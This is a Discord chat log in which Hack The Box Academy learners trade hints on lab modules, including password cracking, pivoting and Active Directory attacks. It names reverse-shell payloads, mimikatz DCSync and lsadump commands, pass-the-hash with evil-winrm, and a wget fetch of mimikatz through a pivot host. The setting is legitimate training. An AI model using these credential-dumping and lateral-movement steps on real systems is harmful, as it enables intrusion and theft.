setting on your end only accepting DMs from friends

reset the target

yeah, tried but keep getting the same problem. Moving to a different lab for now. Maybe it will be better later on 🤷‍♂️

hey stupid question but how do i know what the flag is.. is it alway something like HTB{examlpe_flag} like HTB{64$!c_cURL_u$3r}

not always

it will usually either be told to you that the format is HTB{..} or when you get the flag it's that

however there are occasions where the flag is just a string of alphanumerics or l337 speak pertaining to how you obtained the flag

lol so i have to sometimes really read the question to make sure i know if its telling me what the flag may be or i will just see that and know its a flag

srry i just did a lab and i had no idea what the flag was with out a little google... and the question never even told me what to look for just to get the flag

yep

9 times outta 10 it's in the form of HTB{..}

Yosh, but sometimes it can be different but the question will dictate

thanks ❤️

yep and USUALLY they tell you explicitly that there is a /path/to/flag.txt or /path/to/${user}.txt file you're looking for

What payload would you suggest I try? I tried reverse_tcp I think and it just keep auto closing over and over.

Password for htb-student@//10.129.231.212/Share: 
mount error(115): Operation now in progress
Refer to the mount.cifs(8) manual page (e.g. man mount.cifs) and kernel log messages (dmesg)``` how to resolve this error?

You try it by the hostname instead? Also after add a --verbose and see if it gives any extra details

I try to mount a folder which is on windows 10 to linux.

They're on windows fundamentals

Any other solution for this?

If you're using your own VM do sudo apt upgrade && sudo apt update

I already do this.

Also

It says it's in progress doesn't necessarily say it failed

See if you can visit that directory

Is that the command they are telling you to do? Is that the IP of the spawned target

yes, I checked twice everything correct.

Is that the name of the share file

yes.

could anyone give me a nudge on broken authenttication - bruteforcing cookies?

I'm struggling to find the right role for the first question

What's the section you're on

how do i get html codes

NTFS vs. Share Permissions

how do i get html codes

smbclient -L IPaddressOfTarget -U htb-student

NTFS is a Windows tool ?

New Technology File System

So it is a bit like Samba

What module is this about

oh wait mb

wrong server

No; NTFS is a file structure like how everything in Linux is a file

NTFS is used in Windows

And the Active Directory is part of the NTFS since it is a kind of phonebook

sighs

Take the fundamental courses on https://academy.hackthebox.com before asking any additional simple questions kibwe

I am trying to learn but I keep forgetting the basics

google.com

Write the basics down somewhere then

Is HTB actively working on growing the academy with new content? I assume so and if that is the case is there a suggestion area?

No one?

did you find that || admin hash || in the || notes folder || ?

i just give it a try and windows/x64/shell/reverse_tcp seem to be working fine for me or you can try getting a shell with nc.exe for a sanity check

dude, i've been trying everything I've found in those ||notes folders || via ||evil-winrm|| but i cant do shit with it, any tip pls?

the user you're trying to reach is attempting to sleep

it's been a wild and fun experience

even though i've been through 2.5 years of college i got some really great fundamental knowledge from Information Security Foundations

and a lot of stuff i've learned is immediately applicable to my classes

there's always something to learn

I'm almost 2 years into college and I've learned next to nothing from my classes

Nearly everything I know I've learned on my own

it really kinda sucks doesn't it

if you go out of your way to seek what you want, you'll retain that information much longer

and the way academy modules are structured helps

nice

can someone help me with the following question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I am using this command: url https://www.inlanefreight.com | grep "inlanefreight" | sed 's/^.*(inlanefreight)//' | sort | uniq -u | wc -l

but the answer is wron

the file upload attack skill assessment was not easy....!

not helped by the little green button i didnt take any notice of for a while...

which module and section are you on?

Linux Fundamental - filter contents

yeah i'll go and check that section because i think my note is custom (i use 11 thing after the curl coomand )

ok. thanks

• 5 cut command 🤣

Regarding the Shells and Payloads module skills assessment, is it possible to get a webshell on host 1 without the creds in the hint?

And, is Links the only browser installed? Pain in the ass to use

yes but it's 90% unintended and i'm not sure it's still work but there isn't only 1 application on that host

interesting

🔥

this channel is for htb academy modules

i need to get that platinum subscription

Hey guys, I'm having some trouble with the footprinting module, dns sub-section.

I think I understand the theory behind dns zone transfers (tho I'm still kinda confused on what zones are specificaly).

I'm having trouble doing the last question where I need to find the x.x.x.203 IP using the dnsenum tool.
If I understood the course well I need to trick the main dns (root.inlanefreight.htb) to give me it's gold by pretending to be internal.inlanefreight.htb but how do I practically do that? what is the flag in dnsenum to do so?

Thanks for any help!

What tool is best used for this one? AD Enumeration module

What powerful local group on the Domain Controller is the SAPService user a member of?

PowerView

or

well it's a localgroup

@soft cloud yeah i'm not sure what's the intended way to solve this because this a beginner module and even google give me mostly complex stuff

if you're on the domain controller that's a default windows command

I'm on a linux machine, not on the DC itself

the one show in the example

which section are you on?

Kerberoasting - from Linux

||GetUserSPNs||

It's only utilizing ||GetUserSPNs.py|| in that section

Yeah that's what I thought off but no luck, aight, will look deeper into it

HELLO

I mean no real need to trick anything, just try zone transferring

dnsenum subdomain brute forcing tool (i think) so not sure if you can do that but hint you'll need to run that tool on something that you found hint not the main domain

Subdomains of subdomains of...

if you use that tool to dump like the example there is literally a section of that output named MemberOf

Yeah my dumb ass was typing the answer with typo in the question...

i think that's call level (somehthing) subdomains but no idea

Fuck yes!!!

any plans for these?

😭 so much to do so little time

I have a question concerning broken authentication - skill assessment, could I dm someone?

i got 80 cube so for the love of god pls release a tier 2 module so i can have even number cube

"SQL INJECTION FUNDAMENTALS " is so looooooooooooooong

The fundamentals tend to be long if there's a bit to go through

I’m using AttackBox to do the Intro to Assembly module. What’s the best way to get the zip files you’re supposed to download onto the AttackBox?

mind if I pm you the output of my logs (to avoid spoilers)

I try to keep alive myself😂

sure

this is not thm it's the pwnbox 🤣

also you can just use wget

I knew I was going to cop it for the wrong name - didn’t know the right one 😂

guys
what is cpe ?

Continuing professional education

^

Some certifications expire after x amount of years, CPE allows you to renew without retaking exam

https://corporatefinanceinstitute.com/resources/career/continuing-professional-education-cpe/

https://lmgtfy.com?q=https://www.hdns.io/

hello everyone, im on the attacking common services module on the email services section talking about pop3, imap, smtp. i have found the username for the domain but unsure of how to start going about finding the rest of the credentials required to access the account. i have tried hydra but no luck with the password list provided in resources. should i try a different password list (rockyou - one of the smaller ones maybe?).

one thing i havent tried yet is using o365spray or similar cloud based attacks due to the fact that the server provided doesnt seem to be one, so i dont think its the intended method

Figured it out - wasnt using the correct username

When will the new Job Role Path be available?
All the new modules are guaranteed to do that. Right? Please say yes

i know what you mean

Mood

Can I DM you about this?

sure

guys, does cubes currency become much of a problem later on? I've just the intro the academy and not sure where to go to next

like is it worth spending cubes on linux fundamentals as I am a newbie

ayuda, por favor

if you have the basic subscription you will have enough cubes to pace yourself going forward in my experience. but it depends on how fast you want to go and what you want to learn. as a newbie and with me not knowing your knowledge base i would suggest not skipping fundamental modules as they have some great information.

if you are new to this give both of those video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

yeah I know nothing, I'll try and do all of the fundementals thens

thanks!! I'll check these videos out

Learn the basics of networking, computers, and coding before hacking

Depends. Networking ond computer basics for sure. Coding not so much. You only need ot be able to read code to be a pentester, you dont need to be able to write it yourself really

If you wanna go into something more advanced like redteaming tho then youll need to be able to code

Still something you want to know, particularly for web apps. Learning to write it helps you learn to read it. You don't need to be on the level of a developer, but you need to know what the code is doing.

True

Hey! Someone have solve Password Attacks Lab Medium ? Im stuck for priv esc? 🙂

And knowing a little bit on how to build web apps can give you the perspective of how people can misconfigure them

Yes. That is very important. While you can be a pentester without being a developer, very very often people dont actually understand how the applications theyre attacking are built.

And that causes problems

Would you have any other suggestions for a shell? When I tried@that one it@just kept auto closing the shell over and over again.
When I googled the section someone has the same@issue

Need some more info my dude 😉

At work. If you search my name you should see my recent posts and what section/ module and issue I’m having.
#been a problem for me for about two days. Real headache…..

Doing Intro to Windows Command Line Skills Assessment. The pattern is that the answer to previous question is password for next user but I can’t work out what it would be for user4. The previous answer was a number and the files were all empty so there was no flag either that could be used as a password

no one wants to have to search and scroll back to find your problem again

hi, does this: ||af6172da1f353a9b9bbbaac3ac1ed4c4:434990c8a25d2be94863561ae98bd682||look like anything anybody knows? a type of hash or something?

kinda banging my head against the wall with the broken auth skill assessment lol

yes and it's spoiler

my bad

hint decode it separately

Stuck on the Password Attacks hard lab. I have cracked the Backup.vhd. But how on earth am I able to mount or open the vhd file? I tried all the online instructions, but keep getting weird errors.

by previous answer i think he mean the one if the section

yeah that just crossed my mind looking at it for the millionth time

im currently on the easy lab for attacking common services - was able to find the credentials to log into the ftp server but everytime i try to use the ls command im getting a '229 entering extended passive mode'. is there something im doing wrong?

This is literally the only thing preventing me from finishing this module.

hint the password is the total number of hidden files

I was talking about RudeRaph

oh sorry 🤣

#modules message

and i think there should be something about this in the module (forgot the section though)

Is that valid though? I’ve got the number of files right in the question but it’s not working to SSH in, thought it might be too short.

try doing that on the pwnbox and i think i did have similar issue with ftp through randomly for some reason

actually I don't really get it, this is an MD5 hash right? so i can't decode it can I?

try the second one first

im trying a different route to the flag

maybe itll turn something up

shoot me a dm with your answer just to double check

i mean try on the pwnbox for the ftp error

you can remove the first 17000 passwords or the first 150000 passwords

HI !
On the web service & api attacks in Information Disclosure (with a twist of SQLi) section :
Is a simple question about sqli
But in the second question I don't understand, we are asked for the username that has a position 736373 .
In the section we are told to try the users with IDs from 1 to 10000.
I have tried up to 100,000 but I only have IDs 1, 2 and 3.
And none of them have position 736373.
The response like this :
[{"id":"2","username":"HTB-User-John","position":"2"}]

ill give it a shot on pwnbox and see what it says

yeah that's only apply for 1 section and i think it will and did work for other also un-useable for other section

yes it is only usable for one section

only 1? i didn't even know that 🤣

i didn't noted down why but hint try some ||login bypass|| payload

and also you can do this with sqlmap

yeah works on pwnbox wtf

for the other sections just sort -u the mutated list and you should be good to go

if you want to test to see where is the issue is try something like regenerate the vpn key and debug stuff from there or just don't

i mean its fine i got the files i needed i think

i'll may re do my note on some of the module but offshore been kicking me in my nut lately but this module is still on my list to i may add this to my note and may bug you for some more info

Hey! Someone have solve Password Attacks Lab Medium ? Im stuck for priv esc? 🙂

i was wrong the module show you how to mount the file on windows 🤣 which for 10 pro you can just double click

hint ssh

Can't get it to work unfortunately. This part is giving me an error:

sudo dislocker /dev/loop0p2 -u(password) -- /media/bitLocker

Do i have to put it in like this?

sudo dislocker /dev/loop0p2 -u ExamplePassw0rd -- /media/bitLocker

Do i need quotes? Does there need to be a space??

oh no quotes or space

#modules message

i was able to do it using this

@vital adder to be honest though i feel like im chasing my tail a bit with this. i dont see useful info in the files i dont think

oh wait

i think i see something

but how cloud you do it with only those link? also the only article i didn't find from the other post was the one from itsfoss, in this case the vhd file isn't a disk it's partition

so before you can mount it you have to use losetup to convert it into something that's mountable which none of the blog show

and that's kinda suck for beginner

specifically this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

nope nvm i dont get what im supposed to do with this info

im sure its useful. but i just am not sure

finished broken authentication

the more i do them the more I hate bruteforcing modules

i forgot some term so just have to look up some thing and i think i got it wrong the vhd file is a disk and you have to use losetup to create a partitioned which that article kinda show but in a different way i think

Hello guys, i need help

Thanks! I copied the SAM and SYSTEM file. Now i can proceed hopefully. I'm not going to lie here, i think most of the questions in the Password Attacks module are horrendous and really need some work. The fact that there is no explanation about mounting vhd in the module is absurd to be honest. Sorry for ranting, thanks for the help.

Hashfile '7z.hash' on line 1 (hashca...c3063744d081db1492ea1cdef7a9b983): Signature unmatched

so sure how you miss this but if logged as a user started with ||m|| then should be some super obviously stuff

I think you have to use john to do the cracking my man

also try it in pwnbox

is the first bit of your hash the name if the file?

and yes try with john

no im logged into a user that starts with an ||f||

yeah no idea about that user

also no note about that use

are you looking at the same assessment as me? attacking common services - easy lab?

ok i will try john, because in Tutorials is using hashcat

nope sorry wrong one so hint you are not supposed to login but exploit it 🤣

you are supposed to exploit the information from those files you retrieve from the ftp server?

that's for a different hash then the one you got i just check my note and for hash cat i'm also using a different mode and the example one

\

for the hashcat (and john) mode you can try hashid -jm (hash or hash file)

why would you think sending a screenshot the password is a good idea ??

nope from the info you have before that

oh

Thank you, I continue to learn

ah nothing wake you up more than an helping spree

*except red bull

XD

flag acquired. can i pm you?

sure

Quick question (hopefully): In the password cracking module I just learned about crackmapexec. The examples use the switch "-u user.list -p password.list". I cannot use "user.list" can I? Do I need to supply my own user/pass lists? Cause if so, how do I generate user/password lists for a target I have no info on?

is this cracking passwords with hashcat or password attacks?

The module is called "Password attacks", the page is 'network services' (about WINRM, SSH, RDP, SMB, etc)

ok, i havent done that module myself. but in general you could always try SecLists

That makes sense, I did look through those. Only found password lists, not username lists? I'll try looking again 🙂

they are there

Ah its a completely different directory! Found it, thank you!!

I"ll give that a try

Also, click on Resources (upper right) there is a list in that module you can download as well (in a ZIP).

Hi

Hi all,
I'm in the Password Attacks module, Credential Hunting in Linux section. I don't think i understand the question. I've tried brute forcing the password for user Will and Kira using the provided password.list, both FTP, SSH and SMB has been tried - no luck. Can i get a hint?

hi

-u /path/to/user.list

Their passwords require a bit of mutation using the custom.rule

Also lowercase usernames @uncut mirage

Hi, in Password Attacks module - medium lab.. I am trying to open the Doc file, and it just not working.. tried John with the mutated list and with rockyou now.. Which list should I try?

Did you doc2john?

office2john..

is it someting else?

Got it! there are a lot of options though, damn haha

Generally though if you're supplied a user.list though it's correct

Anyone online finished the shells and payloads section? I am having an issue on the live engagement.

https://dontasktoask.com

Ok thanks! Seems weird though, i already did this in the Password Mutations section. Why the same problem again? This seems to have nothing to do with Credential Hunting in Linux...

it's following the same lines of thought

each section is building on each other

by the way; the credentials do not change

:) so I would definitely keep note of them

yeah I had a list of em for that module as well

Hey fellow hacker. i am stuck on the same problem. it seems there has been some missing information. i used the curl method and got back some injection points by now what? Is the question looking fofr a flag or a command?

ping don't work Getting started / Privilege Escalation. Reset target dosen't work.

yo Im stucked on the login brute forcing - Service Authentication Brute Forcing... seams that the vm is not reachable... the vm commes with a port x.x.x.x:12345, but first exercise ask to hydra the ssh (22) service... Is it normal? did you also have problems connecting victim IPs or is it only related to this module??

which section are you on?

you can't ping or scan docker container you only have access to that one port that it give you

My thinking now is that i need to brute force the kira account using a mutated list created with passwords.list and custom.rule like you told me. Then, when i get access to the system i need to hunt for user will's credentials in the Linux machine, correct?

on sql essential flag 2 case2

potentially :) i'm not ruling anything out

I'm planning on redoing this module once Finished to really soak it in

and make better notes

sqlmap essentials http request

in hydra you can just use the port flag and give it the target port but in my note i use ssh://(ip):(port)

Can you at least tell me if i need to hunt for any credentials in linux? 😛

that's for you to find out :)

the section IS called Credential Hunting in Linux :^)

i try ping because ssh dosen't work ssh user1@ip:port
it give ssh: Could not resolve hostname ip:port : Name or service not known

just check that section to make sure it's needed a flag but if you found an injection point just run sqlmap with that

for this flag i save the request in to a file and run sqlmap with that file

why tf you should use ssh like that ???

there is a port tag

Exactly! ||Then i need to brute force the kira user.|| Thanks!

i got that to work but i cant get it without burp?

yeah it's ssh user@ IP -p port

i guess so

fuckin hate discord sometimes

poor guy named ip

he probably has notifications off for this or had his account hacked and it's just a botted account at this point

o i Forget i think my brain sleep

F for ip

no it's needed red bull

btw tom i pm'd you again if you got a minute

Tom: relevant thing in gen-images

jk don't forget to sleep

yeah i saw that and i only go to that channel for cute red panda

yeah i saw that but i'm still helping 2 guys right now so give me a sec

its np not urgent

of course only the hard lab is

im just starting the hard lab now so just get back to me when you are free

LOL

@raven cairn i will use that dancing squirrel (hopefully) when i pass cpts

spoiler alert offshore is still not finished twisting my D and the APTlabs is waiting for it turn on my D

Lmao

yeah that's not a joke my nut is hurting really bad right now

Hi, may I DM someone about "Skill Assessment - Service Login" (Login Bruteforce) ?

sure shoot me a dm

Hi there all, having an odd issue on the "Bind Shells" module with the 2nd practical question. Nc is giving me a "Cannot Assign Requested Address Error" . Tried a few different VPN servers, no luck. Anyone perhaps have an idea?

Ignore, figured it out 🙂

Hey everyone, I'm new to HTB and Discord. Can anyone help me understand how to get my VPN going? I download the VPN Connection file, but what am I supposed to do with it? All it does is download a Word file.

hi, on https://academy.hackthebox.com/module/80/section/782 (Brute force a cookie) question2. I understood what I had to do, but it was impossible to find the right combination with cyberchef. ||I saw that one part of the cookie was fixed and the other varied||. But I can't find the right combination, any tips?

Anyone mind helping on Password Attacks - Credential Hunting in Windows? I found the answer(what I believe to be) for the last question but its not accepting it.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@rocky citrus ^

Also anyone have any experience with laZagne?

Also, realized I need to do the user:password format and not just the password...

Finally found the .exe release standalone on github, was trying to utilize the python file instead

Thank you!👍 @fathom pendant I'll check that out.

hi everyone

i dont really like that some challenges are literally impossible unless the hint is read because it provides vital information like "login with blablacreds"...

iirc the hint system is being reevaluated exactly fir that reason

yeah cause i come from an offensive security background and i try to never look at hints

and this is getting annoying cause im wasting so much time lol

im on the file transfers module on the first question for the section 'linux file transfer methods'. the phrasing for the question makes it seem that i should be using python to download the file from the target machine. is it that or is it that the target machine is hosting the file using python http server and i can just use any of the simple methods to grab it?

The file transfer section has you remote in to do the file transfers iirc

For linux

yup you do that starting on the second question though, not the first.

first question: Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.

im assuming you just use the same method as you can do with the windows section

because i did it...and it worked

but the phrasing for the question seems just a little weird

Hey all, looking for some help with the skills assessment for Pivoting and tunnelling section. Up to the last two questions but can't seem to pivot to the new box. Anyone able to DM me to chat or anyone have any hints here?

Reverse Port Forward :
https://academy.hackthebox.com/module/158/section/1427
Problem :
i get response in msfconsole but "Command Shell Closed"
payload :

• windows/x64/meterpreter_reverse_https
• windows/x64/meterpreter/reverse_https

ok (set payload payload/windows/x64/meterpreter_reverse_tcp) works

there's something on the box to clue you in on your next step

much better question now. it says to upload the zip file and then unzip it on the target box. i dont see which tool they expect you to use to unzip it. unzip, 7z, etc. are not installed

gunzip?

i think is what's installed

ok how do i know thats installed

for future reference

not gunzip specifically

but in general, application listing via ssh

bc i thought about looking in /usr/share might show something but i didnt see it there

oh its in bin

not share

F

ye

gunzip is a binary but it's also just good to know in general what common zip/archive tools are

are you sure gunzip works for .zip files?

judging by the name... i'd say yea

its not though

im stupid then

to be fair i have no idea if it does

it does

wait i think i got it

needed -S flag

I've been over the box, I have creds for user v***** and ssh key for m*****
I've tried to netsh ports from/to each box over common remote solutions.
Everytime I try ssh I get connection terminated for v***** and the ssh session just goes back to the same box pivot-srv01
Everytime I RDP it doesn't connect to the other internal network.
Any other clue without giving too much away?

you are overthinking it. the box gives you the clue you need to get to the next box, and the hop to it is very simple.

friendly reminder that if you're using mstsc.exe to RDP to a box, fill out all the information before attempting to connect

When doing web exploitation with metasploit, I can't figure out what the TARGETUI is supposed to be. for the current exploit im running, metasploit says it needs to the full URI path to getsimplecsm. I've tried inputting all the base directories

google "what is a URI"

figured it out @fathom pendant ty! btw, you know if the upload feature for the knowledge check machine in the getting started module is supposed to be broken?

Don't know what you mean by broken?

metasploit is unable to upload, and manually I am not either, "there was a problem uploading"

It shouldn't be broken

how are you trying to upload?

hmmm, hold up, may have figured it out

Thanks calculac0re I managed to RDP into the new host with the user v***** but it appears to still be the old host I RDP's from.... any ideas?

Hello

Am not new but I have no idea what we do here

i don't understand. you RDP'd into the new host and... it's a host you already RDP'd from??

this is the channel for discussing HTB academy modules. the rest of the discord channels are locked until you verify yourself -> #welcome

Alright I will do if I find a reason ig

I've RDP's onto the first host, got flag, dumped creds > new user.
Enumerated network for new host. While still RPD'd in I followed your advice (I'm such an idiot) and filled in details I was missing and am able to connect to the new host. Although when connected (RDP tab matches new IP) It is still the old box E.g. flag is that of the previous host/question...

you ||did a ping sweep|| and ||verified that the host to hop to is on another network you haven't seen before||?

Iam doing the brute force login module. But everytime I try to load the log in page they give us, it says proxy server is refusing connections. I dont think thatis suppose to be part of the scenario or is it?

check your browser settings (proxy)

cool

Module Pivoting

Section

Meterpreter Tunneling & Port Forwarding

This worked last night but tonight it doesn't.

check your payload on msfconsole..

ahh i think you are right

same thing happened to me

Do you have to run proxychains msfconsole? or just msfconsole?

I never udnerstood if that was a requirement but a previous lesson they ran that command.

msfconsole is for setting up the proxy, so you don't need to run it as proxychains msfconsole

you only use proxychains if you're trying to run your command through your proxy onto the separate network

did you set the LHOST correctly (tun0)

yeah. Figured it out. I needed to use a different exploit for metasploit. and I needed to disable a plugin in the browser which was hinted at by reading the page source code

For the previous section... I tried everything. I had two people send me instructions but i could never get the shell to open.

It kept closing over and over. Someone said the shell was too big... So i tried another and that was to no avail.

What did you do for that one?

Would you DM?

sure just brushing my teeth rn

I do have a question tho. how do I ctrl + Z out of something in a shell/reverse tcp shell without just closing the shell alltogether

if you ctrl+z just do fg once you're back i think for this one i gave up on trying to get a working pty

this is killing me

https://academy.hackthebox.com/module/35/section/227

im not sure why

but im unable to get the flag

ive already entered everything

and executed every command

and then deleted the city

i renamed france to flag

then deleted flag

and then went to the IP and Port and searched flag and it just says []

Am i missing something?

Module: Attacking Common Services
Section: Attacking SQL Databases

I've extracted the service user hash and am attempting to crack. I've tried hashcat and john for a || netNTLMv2 || hash type using the provided password list without success, I've also tried the rockyou wordlist with no luck, I've tried the best64 ruleset with both wordlists suspecting it may be a password mutation but I'm a bit lost. I suspect I've got the wrong hash type or may need to edit it for the tools to work property, can I get a sanity check that I'm on the right track?

Information Gathering - Web - Skills Assessment-Last question. am using hint provided using sublist3r and it starts running against target then just stops after this error - Error: Virustotal probably now is blocking our requests. not sure what to do as screenshots of other people running it does this but also gets passed and runs the script

try using a different tool?

Any particular reason why the connection keeps timing out when I try to ssh into Bill Gates ssh for the login cracking lab?

pivoting
section Meterpreter Tunneling & Port Forwarding

I've tried this for the SRVHOST as well 127.0.0.1

same result. anyone know why this is happening?

Since Yesterday I try to resolve this error.
do_connect: Connection to 10.129.218.38 failed (Error NT_STATUS_IO_TIMEOUT)

This command gives me error - "smbclient -L 10.129.218.38 -U htb-student
"

I try to off the firewall and now everything is fine.

Is there any particular reason why the hosts keep timing out?

no idea

I cant even ping the ip from mypwnbox

question for DCSync in Active Directory Enumeration & Attacks
i understand they want me to use secretsdump.py which is on the linux
but the system they enable for me was the windows

Yes

and

do i need to swap it or is there secretsdump.py on the windows aswell?

Windows can run python

do i need to revert it because i do not see secretsdump.py in the tools 😅
or do i neeed to copy and paste it over

Which quiz in the module is this for?

https://academy.hackthebox.com/module/143/section/1489
question 2

the dcsync

@glossy cipher You can do DCSnyc with ||Mimikatz ||on Windows

Or ||Invoke-DCSync ||

ohh i will try with ||invoke-DCSync||
||mimikatz|| keeps giving me an error when i follow the attack

What kind of error?

ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

i even did the debug and the token elevate

still same issue

irrelevant, get lost

@glossy cipher Try with ||lsadump::lsa /patch|| or|| lsadump::sam||

dont seem to work

||lsadump::lsa /patch|| seem to work only in local
the domain it just gives me an error

Is there anyway to find out if its my problem or the machines problem why its not responding? when I run nmap it says its filtered.

Can someone help me out with command injection skills assessment its been hour
I am getting error like
file doesn't exist
Malicious command
And whole payload printed with file not found
File not found
Can someone tell hint me how to find the injectable parameters, is it GET OR POST request.
I have tried all the filters bypass but getting nothing.

Hi someone could help me with skiils assessment on Secure Coding 101:Javascript , last two questions , thanks

Did You identify the copy or move command ? If you did it , think that You have two options to inject commands, in the middle of the sentence or in the end. Example: " mv filename_origin (here) filename_destiny (here).

@woven copper I have tried using & | ; in encode form with and without space it just print my whole payload with fill not found error

Big thanks to calculac0re today for their help. Just wondering if the Pivoting Skills assessment requires us to scan a full /16 for additional hosts?

There are more options to try, i suggest review the material and cheetsheets

No , requieres scan two nets, both of /24.

Thanks for the hint, managed to find a new host and pivot to it. Now for the last pivot... scratch that, done!

pivoting looks so cool on my screen

yo

I have a (probably stupid) problem with web attacks - bypassing security filters

whatever HTTP method I use, the request gets flagged by the filter as malicious

am I missing smth?

In password attacks - Network services i'm doing the right way? it's take too much time... i think at least 1h30

Once I completed a module and If module is upgraded or if the subscription ends do I need to pay to do the module again. Or it will be unlocked forever

Once you have completed the module, you can keep it. Updates are then "free of charge“

Hello! I need help with the "information gathering - web edition" module in the section "Active infrastructure identification" in the question 2

Hey bud, did you ever get that working?

I'm stuck on the final assessment of the file upload attacks. I'm trying an XXE attack but I keep getting 500 internal server error 🤔

I'm really not sure why the XXE is not working mmmh

had non printable chars before my payload without knowing 🤦‍♂️

try the Change Request Method in burp or if you do it manually you'll have to fix the format up a bit, not sure if this is your issue but in note this is super obvious

Hello! I need help with the "information gathering - web edition" module in the section "Active infrastructure identification" in the question 2, please!

i would do that section from the top down and if you got a working cred then here is a tip for that, login and take all of the username in that machine and use it as a username wordlist so you are working with valid username

hint use whatweb

and if the default mode scan doesn't work for some reason try use -a 3 (most likely you don't need to use this mode)

Thanks!

can somebody pls explain me the meaning of these buttons in this page? i mean I completed these modules but why some of them have 'unlock' button and others 'start' ?

I continue and now I need help with the "information gathering - web edition" module in the section "Virtual hosts" in the first question, please!

@hallow swift use gobuster to enumerate the vhost

(sql inj excluded lol)

i don't have any unfinished module but if you got one it should say continue or something like that and if you finished a module it should say view or if you own a module but didn't do it it will say start

so in your case if you done all 3 of the module that have the full task bar then that's a bug

i completed those 3 modules 100%

also how can you view module like this? i never see module put in this format before just path

if you are in a beta thing then it's 100% a bug

you mean something like this?
gobuster vhost -u [target_url] -w [wordlist]

go here: https://academy.hackthebox.com/exams/3/ then in the left side of the page under the title there are 3 buttons, click on "RELATED JOB-ROLE PATH"

like lol "start" what hahah i made them all already

@hallow swift yes

Can someone confirm the following for me pls? (basically YES or NO would be enough as I'm not stuck just confused a little bit)

Getting Started Module, privilege escalation section.
According to the description in the beginning of the section, there's a part where ./linpeas.sh has to be used after cloning PEASS from GitHub. Apparently linpeas.sh is now called linpeas_base.sh

didn't even know that is a button 🤣

thought i was doing it all in the wrong way at the beginning hahah

but yeah my show the same all module is set as start

do i get some award after discovering this bug? lol

i mean if you help out a lot a find some good bug (like in module content) i think yeah, you can maybe ask some stuff for some stuff

or if you some bug that are related to hacking then you can get bounty but i'm not sure if htb have one i just know thm have one

hahaha yeah i was jk, dont have time for that, still at 47% for the pentesting certification, this stuff is endless

nope it's still case linpeas.sh and you can just wget it from the release page not clone the source code

Hey guys, does anyone how to find the answer to this question?
Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.

It's on windows fundamentals

section - Windows Services & Processes

for finding the services you can use the given powershell command but instead of select -First 2 use select * to get everything and you don't need to touch the rest

but to find non-standard update services you'll have to google around a bit to find which is standard and which is not

oh, okay

Hello!
AD Enumeration & Attacks - Skills Assessment Part I
Can someone give me a hint on how to take control over the Domain Controller?

first did you take over the MS01 machine?

Yes, I have completed the previous 6 questions

I have access to MS01 as S*****c and have done the DC attack using the user t****y

to you pwn the DC 🤣 ???

then what's the issue?

I don't know how I can access the DC

did you get the Administrator hash?

I think so, I used secretsdump from kali to get the hashes using the -just-dc argument against the DC

also you may want to put the vuln in spoiler tag (use ||spoiler message||)

which target_url do I have to use? I can't get it 🤔

and you use the MS01 as a pivot point right?

also you can use -just-dc-user administrator to just get the administrator hash after that you can just connect in and get the flag

@hallow swift the url which u are using to access the website

you mean www.inlanefreight.htb ?

@hallow swift yes

but it says is unable to connect

I established a reverse port forwarding tunnel using chisel between my kali and web-win01 and then accessed MS01 from kali

if you got a meterpreter shell on MS01 you can just use autoroute and use proxychains(4) to access the DC

do I have to add it to my etc/hosts ?

@hallow swift use just need to brute force the vhost using gobuster or ffuf

also on "that" privileges section they also show you how to exploit it with mimikatz and if you rdp in with xfreerdp and use the /drive: tag to mount one of your directory as a shared drive on the target machine you can just open a cmd shell on the target machine and use mimikatz from that shared drive so from your machine without having to copy it over with something like this \\TSCLIENT\home\x64\mimikatz.exe

oh well, I did it with ffuf

use /drive:linux,/tmp to share /tmp folder. Is really useful :d

but I think I used the wrong wordlist, look:
ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://<TARGET_IP> -H "HOST: FUZZ.inlanefreight.htb" -fs 612

I already did this, and I tried to use the S*****C kerberos tkt to execute a silver ticket attack, but I think the S****C user doesn't have enough privileges as I got this error:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

@placid quest I found the first flag, thanks!

but thanks @vital adder , I will try to access the DC using the admin hash using a PTH attack such as evil-winrm or psexec.

yeah i don't think i did a silver ticket attack for this assessment

yep you can just t**y > ||privileges|| > DC01 administrator hash and evil-winrm to get the flag

@hallow swift no problem

Great! Thank you very much!

Hello

LOGIN BRUTE FORCING
Skills Assessment - Website

someone can give me a hint ? 😇

Secure Coding 101 : Javascript , skills assessment, anyone with a hint on the /Reverse endpoint ?

If you can ps remote you can create a remote session to the computer and use Copy-Item

can anyone explain me how to find the hostname becouse its turining me crazy

this is the folder

i already have

i am root aswell

yes it autocompleted

is your attack box a linux box?

try port forwarding with meterpreter

hey, for the skill assesment of server-side attacks I'm having a bit of troubles locating the flag file...

I would think it would be under /app/flag.txt

i solved it already

dont wanna talk ab it

wget http://<pivot host IP>:<port>/mimikatz.exe -o mimikatz.exe

yeah it'll still work

start the web server on your attack host

if you've got a socks proxy running on msfconsole and you've ran autoroute on your meterpreter session, you can do a reverse port forward on the meterpreter session so that you can download files off your attack box to the host on the internal network

but it doesn't seem the case and also not /flag.txt. Do we need to get rce or so?

i'm not sure what you mean by that

cd root

yeah so the attack box can access the internal host but the internal host can't access the attack box

so you do a reverse port forward with meterpreter so that the internal host has a route to your attack box

Or cd /

Well I did eternal blue CTF on htb

What's pivots https server

A particular website hosted on this server

bump (sorry) 🙂

okay ... wow hehe

hey guys, i'm doing the metasploit module rn and can't find the answer to the " Which version of Metasploit is free and can be used only through a CLI?" 😅 I've tried entering like metasploit framework and stuff but it doesn't work

what command do you run when you start the program you are speaking of?

thanks bro!

are you sure you're setting it up correctly

what does your port forward look like on meterpreter

is your attack box on the 172.16.6.0 network?

then change that IP address to the tun0 IP address

-L is your attack box

so traffic coming to the pivot host on port 1234 gets forwarded to your attack box on port 8081

there is an easy way

